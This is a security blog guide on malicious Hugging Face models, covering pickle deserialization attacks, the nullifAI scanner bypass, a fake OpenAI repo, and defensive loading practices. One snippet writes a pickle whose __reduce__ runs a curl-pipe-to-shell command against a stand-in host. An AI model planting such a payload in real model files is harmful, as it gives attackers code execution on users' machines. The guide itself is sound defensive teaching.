Hugging Face Malware Models: How to Spot & Avoid Them

A practical guide to the Hugging Face malware model problem: how pickle attacks work, the nullifAI bypass, the 244K-download fake OpenAI repo, and defenses that cover more than just the weights file.

Drew Sullivan · 2026-05-15 · 9 min read · Intermediate

So you’re about to download a model from Hugging Face. You click the repo, see thousands of downloads, scan the README – looks legit. Then a question hits you: could this model actually run code on my machine when I load it?

The short answer: yes, depending on the format. And it’s not hypothetical. A malicious Hugging Face repository posing as an OpenAI release delivered infostealer malware to Windows systems and logged 244,000 downloads before being removed. That is the environment you are downloading from now, and most tutorials on this topic stop at “use safetensors instead of pickle,” which is good advice but nowhere near the full picture.

The story that should change how you download models

Open-OSS/privacy-filter. That was the repo name. It copied OpenAI’s Privacy Filter model card almost word-for-word – same description, same framing. The actual threat wasn’t inside the model weights at all. A file called loader.py sat right next to them, and that’s what did the damage.

According to HiddenLayer’s analysis (reported by CSO Online in late 2024), the repo hit the #1 trending position with approximately 244,000 downloads and 667 likes within 18 hours of going live. HiddenLayer suspects those numbers were artificially inflated to manufacture trust and push the repo into more download queues. Eighteen hours. Trending counters that look impressive are easy to fake.

This shifts the question from “is the .bin file safe?” to “is anything in this repo executable?” – a much harder problem to answer at a glance.

Why pickle is the original sin (and how it actually fires)

Most Hugging Face malware models trace back to one design choice: PyTorch serializes models with Python’s pickle module. Pickle is an official Python serialization format – it converts Python objects to byte streams and back. The Python documentation carries a prominent warning: “It is possible to construct malicious pickle data which will execute arbitrary code during unpickling.” That warning has been there for years. It hasn’t stopped anyone from shipping models in pickle format.

A real example, from JFrog’s analysis of baller423/goober2 (one of roughly 100 malicious models JFrog found on the Hub in early 2024): the malicious payload was injected using the __reduce__ method of the pickle module, which lets attackers insert arbitrary Python into the deserialization process. Here’s the conceptual shape of that injection:

import os
import pickle

class Exploit:
    def __reduce__(self):
        # pickle calls the returned callable with the returned arguments
        # the moment someone runs pickle.load() on this data
        return (os.system, ("curl evil.example.com/x.sh | sh",))

# Attacker bundles this into pytorch_model.bin
with open("pytorch_model.bin", "wb") as f:
    pickle.dump(Exploit(), f)

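No memory-corruption bug. No buffer overflow. Just a normal language feature working as designed. The victim runs torch.load("pytorch_model.bin") with full unpickling enabled (the default before PyTorch 2.6, and still what weights_only=False requests) and the OS call fires before a single tensor is read.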
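One way to see this without triggering it is to read the opcode stream instead of unpickling it. The sketch below uses the standard library's pickletools.genops to list every global a pickle would import. The helper name list_pickle_imports and the harmless print payload are illustrative assumptions, and the string tracking for STACK_GLOBAL is a simplification that real scanners handle more carefully.

```python
import pickle
import pickletools

STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def list_pickle_imports(data: bytes) -> list:
    """Return 'module.name' for each global the pickle references, without unpickling it."""
    imports = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Older protocols carry "module name" as one space-separated argument.
            module, name = arg.split(" ", 1)
            imports.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+ pushes module and name as the two preceding strings.
            module, name = recent_strings[-2:]
            imports.append(f"{module}.{name}")
    return imports

class Harmless:
    """Stand-in for a malicious object; the callable here is just print."""
    def __reduce__(self):
        return (print, ("this would run on load",))

payload = pickle.dumps(Harmless(), protocol=4)
found = list_pickle_imports(payload)  # nothing is executed by this call
```

If that list contains something like os.system, subprocess.Popen, or builtins.exec, the file is not a plain bag of tensors.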

The nullifAI bypass: when the scanner says “all clear” and lies

Hugging Face does scan. It uses an open-source tool called Picklescan that implements a blacklist for dangerous methods – eval, exec, compile, open, and similar. A blacklist is a fine first line. It’s also a fine thing to bypass.

In February 2025, ReversingLabs published research on what they called nullifAI. Turns out the two malicious models they found were stored in PyTorch format but compressed with 7z instead of the ZIP format PyTorch normally uses. That single format change broke torch.load() – but it also broke Picklescan. The scanner errored out and walked away. Python kept reading.

The brutal part: the malicious payload was placed at the start of the pickle stream. Deserialization runs sequentially – so the reverse shell payload executed before parsing hit the broken byte and halted. By then, it was already calling out to a hardcoded IP address.
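The ordering is easy to reproduce with a harmless stand-in. In this sketch the "payload" is just print, and the stream is deliberately corrupted by replacing the final STOP opcode with an invalid byte. The class name Marker and the corruption byte are assumptions for illustration, not a reconstruction of the actual nullifAI samples.

```python
import contextlib
import io
import pickle

class Marker:
    """Harmless stand-in for a payload placed at the start of the stream."""
    def __reduce__(self):
        return (print, ("payload ran",))

good = pickle.dumps(Marker(), protocol=4)
broken = good[:-1] + b"\xff"  # swap the trailing STOP opcode for an invalid one

captured = io.StringIO()
error = None
with contextlib.redirect_stdout(captured):
    try:
        pickle.loads(broken)
    except Exception as exc:  # the load fails, but only after the call happened
        error = exc

payload_ran = "payload ran" in captured.getvalue()
load_failed = error is not None
```

Both flags end up true: the callable fires first, and the unpickling error arrives afterwards. A tool that treats "failed to parse" as "nothing happened" misses exactly this case.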

Hugging Face removed both models within 24 hours of ReversingLabs’ disclosure. Picklescan has since been patched to detect broken pickle files. But the lesson – blacklists are always one creative format trick away from useless – stays true regardless of patching.

Here’s the uncomfortable question this raises: how many other format quirks produce the same result? ZIP vs. 7z was the one that got caught. The answer is: we don’t fully know. Picklescan’s coverage is always bounded by what researchers have discovered and disclosed.
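One defensive posture that does not depend on knowing every quirk in advance is to fail closed: reject any container you did not expect, and treat a scanner crash as a rejection rather than a pass. The sketch below is a minimal illustration of that policy. The function names, the choice to accept only ZIP containers, and the scan callable are assumptions; scan stands in for whatever scanner you actually run.

```python
from typing import Callable

ZIP_MAGIC = b"PK\x03\x04"                # ZIP local file header
SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"  # 7z archive signature

def sniff_container(data: bytes) -> str:
    """Classify a file by its leading bytes only."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(SEVEN_ZIP_MAGIC):
        return "7z"
    if data[:1] == b"\x80":  # PROTO opcode that opens a protocol 2+ pickle
        return "raw-pickle"
    return "unknown"

def gate(data: bytes, scan: Callable[[bytes], bool]) -> str:
    """Return 'accept' only for an expected container that scans clean."""
    if sniff_container(data) != "zip":
        return "reject"
    try:
        clean = scan(data)
    except Exception:
        return "reject"  # a scanner error is never treated as a pass
    return "accept" if clean else "reject"

def crashing_scanner(data: bytes) -> bool:
    raise RuntimeError("could not parse archive")

results = {
    "zip, clean": gate(ZIP_MAGIC + b"...", lambda d: True),
    "7z": gate(SEVEN_ZIP_MAGIC + b"...", lambda d: True),
    "zip, scanner crash": gate(ZIP_MAGIC + b"...", crashing_scanner),
}
```

Only the first entry is accepted. The 7z file is rejected before any scanner sees it, and the crash is counted against the file, not in its favor.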

A safer download workflow (the part most guides skip)

Treat every Hugging Face repo as untrusted code, not just data. The model file is one attack surface. The Python files next to it are another – and that second surface is what the 244K-download infostealer actually used.

Prefer safetensors and force it. Safetensors stores only JSON metadata and raw binary tensor data – no Python objects, no executable code can be embedded. In transformers, pass use_safetensors=True. Per Hugging Face’s own security guidance (updated as of early 2025), this makes loading fail loudly rather than silently falling back to a pickle file.
Pin the revision. Don’t load org/model generically – load it with a specific revision="<commit-sha>". A repo can be edited after you reviewed it.
Never set trust_remote_code=True on a repo you haven’t read line-by-line. That flag runs the repo’s own Python files (modeling_*.py, configuration_*.py, loader.py) on your machine. See the note on the trust_remote_code trap below.
Sandbox the first load. Disposable container, no network egress, no mounted home directory. If something tries to phone home, you see it.
Check the repo, not the counters. Commit history, the uploader’s other repos, and the actual contents of any .py file matter far more than download numbers that can be inflated in hours.
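The first three items in that list can be combined into one loading call. The sketch below is one way to do it, assuming the transformers library is installed. The helper names safe_load_kwargs and load_pinned are hypothetical, and the 40-character check reflects the assumption that you pin a full git commit SHA instead of a branch or tag.

```python
import re

_FULL_SHA = re.compile(r"[0-9a-f]{40}")

def safe_load_kwargs(commit_sha: str) -> dict:
    """Build from_pretrained keyword arguments that pin a commit and refuse pickle and remote code."""
    if not _FULL_SHA.fullmatch(commit_sha):
        raise ValueError("pin a full 40-character commit SHA, not a branch or tag")
    return {
        "revision": commit_sha,      # the exact commit you reviewed
        "use_safetensors": True,     # fail instead of falling back to pickle weights
        "trust_remote_code": False,  # never import Python files from the repo
    }

def load_pinned(repo_id: str, commit_sha: str):
    """Load a model with the settings above; needs transformers and network access."""
    from transformers import AutoModel  # imported lazily so the helper above has no dependencies
    return AutoModel.from_pretrained(repo_id, **safe_load_kwargs(commit_sha))
```

Calling load_pinned("org/model", "<commit-sha>") with a real SHA then either loads safetensors weights from that commit or fails loudly.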

The trust_remote_code trap: If a repo ships both a .safetensors file and a custom loader.py, ask yourself why the loader exists. Legitimate models rarely need one – the transformers library handles loading. A custom loader is a strong smell. More detail in the FAQ below.
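A quick inventory of a downloaded snapshot makes that smell visible before anything is loaded. This is a rough sketch using only the standard library. The function name audit_snapshot and the suffix lists are assumptions, and a .bin file is only possibly pickle-based, so treat the output as a reading list, not a verdict.

```python
import tempfile
from pathlib import Path

CODE_SUFFIXES = {".py", ".sh", ".bat", ".ps1"}
PICKLE_SUFFIXES = {".bin", ".pt", ".pth", ".pkl", ".ckpt"}  # possibly pickle-based

def audit_snapshot(root) -> dict:
    """Group files in a local repo snapshot by how they could execute code."""
    report = {"code": [], "pickle_weights": [], "safetensors": []}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        suffix = path.suffix.lower()
        if suffix in CODE_SUFFIXES:
            report["code"].append(rel)
        elif suffix in PICKLE_SUFFIXES:
            report["pickle_weights"].append(rel)
        elif suffix == ".safetensors":
            report["safetensors"].append(rel)
    return report

# Demo on a throwaway directory that mimics a suspicious repo layout.
with tempfile.TemporaryDirectory() as tmp:
    for name in ("model.safetensors", "pytorch_model.bin", "loader.py", "README.md"):
        (Path(tmp) / name).write_bytes(b"")
    report = audit_snapshot(tmp)
```

Every entry under "code" is something to read in full before trust_remote_code is even considered.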

Worth reading directly: Hugging Face’s Hub security documentation and the safetensors security overview on GitHub.

What the scanners catch – and what they don’t

Here’s how the layered defenses actually compare. The gap column is the one that matters.

Defense	What it stops	Known gap
Picklescan (HF default)	Common bad opcodes in well-formed pickles	Bypassed by 7z-compressed PyTorch archives (ReversingLabs, Feb 2025); blacklist-based, so novel opcode patterns aren’t caught until disclosed
“Unsafe” label on HF	Warns the user	HF marks files unsafe but does not block downloads – users can still retrieve and execute flagged models (per JFrog’s analysis, early 2024)
Safetensors format	Arbitrary code execution from the weights file itself	Doesn’t cover loader.py, modeling_*.py, README install commands, or anything outside the tensor file – the Open-OSS/privacy-filter attack lived entirely in this gap
ClamAV + third-party scans	Known-malware signatures	Novel payloads, encoded/obfuscated loaders, jsonkeeper-style C2 rotation

The safetensors format itself has been independently audited. Trail of Bits performed an external security review commissioned by Hugging Face, EleutherAI, and Stability AI (published May 2023). No critical flaw leading to arbitrary code execution was found. Some missing validation allowed polyglot files – that was fixed. The full blog post links the complete report if you want the detail.
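Part of why the format is auditable is that its layout is small: an 8-byte little-endian length, a JSON header of that length, then raw tensor bytes. The sketch below builds a tiny file by hand and reads the header back with the standard library only. The function name read_safetensors_header is an assumption, and the official safetensors library performs more validation than this.

```python
import json
import struct

def read_safetensors_header(data: bytes) -> dict:
    """Parse only the JSON header of a safetensors blob; no tensor data is interpreted."""
    if len(data) < 8:
        raise ValueError("too short to contain a header length")
    (header_len,) = struct.unpack("<Q", data[:8])  # unsigned 64-bit, little-endian
    if header_len > len(data) - 8:
        raise ValueError("declared header length exceeds file size")
    return json.loads(data[8 : 8 + header_len].decode("utf-8"))

# Hand-built example: one float32 tensor named "w" with two elements.
header = {"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}
header_bytes = json.dumps(header).encode("utf-8")
blob = struct.pack("<Q", len(header_bytes)) + header_bytes + struct.pack("<2f", 1.0, 2.0)

parsed = read_safetensors_header(blob)
```

The header describes names, dtypes, shapes, and byte offsets. There is no slot in it for a callable, which is the property the format is built around.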

Alternatives if you need a higher trust floor

Hugging Face is still the right default for most people. The Hub has real infrastructure behind it – malware scanning, pickle scanning, secrets scanning, MFA, and SOC 2 Type 2 certification (as of this writing). The problem isn’t Hugging Face’s diligence. Open-upload models will always have a gap between upload and scan.

A few options that close some of that gap:

Self-hosted artifact mirrors. Pull approved, pinned revisions into your own registry (JFrog Artifactory, an internal S3 bucket, etc.) and run your CI pipeline’s own scan before anything gets used downstream. Slower, but eliminates the “someone force-pushed the repo overnight” risk entirely.
GGUF via llama.cpp. The format doesn’t execute Python on load. That doesn’t make a malicious model behaviorally safe – but it removes the RCE-at-load-time vector.
Gated or organization-controlled repos. Hugging Face lets organizations restrict who can upload to a namespace. If you’re sourcing models for a team, pushing approved models into your own org repo, with branch protection turned on, limits the blast radius of a compromised upstream.
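For the mirror approach, the check that matters is that the bytes you use downstream are the bytes you approved. A minimal sketch of that check, assuming an allowlist that maps file names to SHA-256 digests recorded at review time (the names sha256_of and is_approved are hypothetical):

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

def sha256_of(path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large weight files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def is_approved(path, approved: dict) -> bool:
    """True only if the file name is on the allowlist and its digest matches."""
    expected = approved.get(Path(path).name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_of(path), expected)

# Demo: approve a file, then change it and check again.
with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "model.safetensors"
    artifact.write_bytes(b"approved weights")
    approved = {"model.safetensors": sha256_of(artifact)}
    ok_before = is_approved(artifact, approved)
    artifact.write_bytes(b"tampered weights")
    ok_after = is_approved(artifact, approved)
```

The same check applies to every file in the mirrored revision, including any .py files, not only the weights.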

Frequently asked questions

Is it safe to download a Hugging Face model marked “unsafe”?

No. Full stop. The label means a Hub scanner such as Picklescan flagged something dangerous in the file, and Hugging Face is letting you proceed at your own risk. Don’t.

Does using transformers’ from_pretrained() protect me automatically?

Partly – but the protection has a very specific shape. If the repo contains only safetensors weights and you pass use_safetensors=True, the tensor load itself is safe. The moment you add trust_remote_code=True, you’re telling transformers to import and execute whatever Python files the repo ships. That was the exact vector in the Open-OSS/privacy-filter campaign: the weights were fine. loader.py was the problem, and it ran because of how the model was invoked. Before enabling that flag, read every .py file in the repo. Every one.

What should I do if I already loaded a suspicious model?

Treat the machine as compromised. Pickle and trust_remote_code execute with your user’s full permissions – SSH keys, browser cookies, environment variables, cloud credentials, all of it was accessible. Disconnect from the network first. Then rotate every token that was on that machine (Hugging Face, AWS, OpenAI, GitHub – anything in your shell environment or ~/.aws). Image the disk before you wipe it. The infostealer in the Open-OSS/privacy-filter campaign specifically targeted Discord tokens, crypto wallets, and Chromium/Gecko browser data, so check those services too. When in doubt, assume the attacker got everything they could reach.
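To build the rotation list, it helps to enumerate what was sitting in the environment. The sketch below returns only the names of variables that look like credentials, never their values. The keyword pattern and the function name credential_like_names are assumptions, and the result is a starting point, not a complete inventory (files such as ~/.aws/credentials need a separate look).

```python
import re

_CREDENTIAL_HINT = re.compile(r"TOKEN|SECRET|KEY|PASSWORD|CREDENTIAL", re.IGNORECASE)

def credential_like_names(env) -> list:
    """Return sorted variable names that look like secrets; values are never read or printed."""
    return sorted(name for name in env if _CREDENTIAL_HINT.search(name))

# Demo with a sample mapping; pass os.environ on a real machine.
sample_env = {
    "HF_TOKEN": "x",
    "AWS_SECRET_ACCESS_KEY": "x",
    "OPENAI_API_KEY": "x",
    "PATH": "/usr/bin",
}
to_rotate = credential_like_names(sample_env)
```

Run it from a clean machine against a saved copy of the environment if you can, since the compromised host should already be off the network.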

Next action: open the last Hugging Face repo you pulled. Check whether it loads from safetensors, whether you passed trust_remote_code=True, and whether there are any .py files you didn’t actually read. If the answers are no / yes / yes – start there.
